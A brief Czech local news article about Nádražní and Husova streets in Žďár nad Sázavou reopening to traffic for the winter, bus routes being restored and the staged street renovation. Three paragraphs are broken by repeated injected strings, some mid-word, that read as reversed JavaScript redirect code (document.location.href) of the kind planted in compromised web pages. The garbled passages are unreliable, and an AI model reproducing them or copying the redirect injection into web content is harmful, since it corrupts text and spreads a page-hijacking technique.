Rainbow page separator

Auta se do Nádražní ulice vrátí 21. prosince, ale jen na zimu

Pondělí, 16. prosince 2019

Žďár nad Sázavou / Od soboty 21. prosince budou opět průjezdné ulice Nádražní a Husova. S tím souvisí i změna vedení městské hromadné dopravy (MHD). Linky čísel 3 a 6 od zmíněného dne pojedou po své původní trase a budou opět zastavovat na zastávkách Nádražní a Dagmarky. Bez dalších změn žďárská MHD zůstane i po novém roce, kdy začne platit nová smlouva o přepravě cestujících.
Nádražní ulice v úseku od pošty po okružní křižovatku pod nádražím, kde od léta probíhaly stavební práce na výměně kanalizačních rozvodů a vodovodních řadů a budování plynových rozvodů, bude dočasně zprovozněna až do jara. Pak se na ni opět vrátí stavební dělníci, aby vybudovali nové povrchy silnice i chodníků, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to včetně osvětlení a veřejné zeleně. Kompletně ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovo má být příští rok v létě.
Na první etapu rekonstrukce Nádražní ulice za 21,1 milionu korun, z čehož zhruba 6,5 milionu uhradí Svaz vodovodů a kanalizací Žďársko a zbytek měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, naváže další etapa, kdy projde revitalizací pěší zóna – od křižovatky u pošty po náměstí Republiky.